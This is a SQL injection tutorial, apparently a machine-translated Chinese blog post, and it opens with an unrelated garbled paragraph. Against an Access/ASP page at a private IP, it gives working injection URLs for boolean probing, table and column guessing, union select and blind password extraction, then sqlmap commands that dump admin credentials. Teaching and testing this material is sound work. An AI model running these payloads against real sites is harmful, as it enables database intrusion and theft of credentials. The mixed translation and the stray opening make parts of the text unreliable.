Qian in "surrounded" in wrote: "about the see the side, can make the meeting a few days before and after the light dipped into a good day," is ah, as long as see you, will be jubilant mood well done, really long. Feeling like this, in principle arrived, but I am happy that you have your plan, I have my purpose, because I like you, I do want to tell you everything together. . .
First, Category
1, static pages
htm or html static pages, no server parses the script
Features: do not rely on a database, inflexible, production, updating, maintenance problems, poor interactivity, functionality is limited, security, database injection vulnerability does not exist
2, dynamic page
asp / aspx / php / jsp the like, by a corresponding script engine to execute explained
Features: Since the database, good flexibility, good interaction, unsafe injection vulnerability exists in the database
Second, the site visit process
Third, the vulnerability causes
Destination URL:? Www.aiyou.com/new.php id = 23
1, the normal flow returns to the site database id for the new page information 23
2, modify the parameter values for the other 23 sql statement
3, the site did not detect this instruction
4, the server executes a new statement, and returns to the site
5, according to the information returned by the client may proceed with further injection
Four, sql injection hazards
1, the database information disclosure
2, the page has been tampered with
3, pages are linked to horse
4, the database is malicious actions
5, the server is remote control
6, the hard disk data DESTRUCTIVE
Five, access database
General combining asp scripts, stored data can not be greater than 100M, only a database name, you can create multiple tables
1, database suffix:. * Mdb
2, asp link to access the database
<%
dimconn,connstr,db
db="Your.mdb"
Setconn= Server.CreateObject("ADODB.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="& Server.MapPath(db)
conn.Openconnstr
%>
3, common tool open EasyAccess
4, vulnerability judge
Goal: http: //192.168.21.136/Production/PRODUCT_DETAIL.asp id = 1513?
Analyzing injection point:
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513/ error, there may be injected
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1 = 1 to return to normal
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 返回错误 存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exsits (select * from msysobjects) > 0 判断access数据库,根据错误提示在msysobjects上没有读取数据权限,说明表存在,从而知道是access数据库
5、查询access数据空中的表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from user) 根据错误判断除灭有user表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from admin) 正常返回,说明存在admin表
6、判断列名
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select password from admin),正常返回,说明存在列名password
常用用户名:name username user_name admin adminuser admin_user admin_username adminname
常用密码名:password pass userpass user_pass pwd userpwd adminpwd admin_pwd
7、判断表的列数
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 ,正常返回说明有22列,如果没有正常继续修改该数字
8、联合查询
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin,知道admin表一共有22列,所以联合查询需要输入1-22,页面只显示3和15,可以修改该两列获取想要的数值
六、另一种方法判断:
1、http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and select len(password) from admin)=16 判断密码的长度,返回正常,说明密码长度为16。
2、 http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 判断密码的第一位,返回正常,说明密码的第一位是a
判断第二位,成功后修改该值,依次判断剩下的密码
七、sqlmap工具利用
目标地址:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
1、测试是否存在漏洞
sqlmap -u “http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513”
2、获取表名
sqlmap -u “http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513” --tables
3、获取列名
sqlmap -u “http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513” --columns -T admin
4、获取指定列的内容
sqlmap -u “http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513” -T admin -C admin,password --dump
Prohibit illegal peril
welcome public attention number: web security tool library
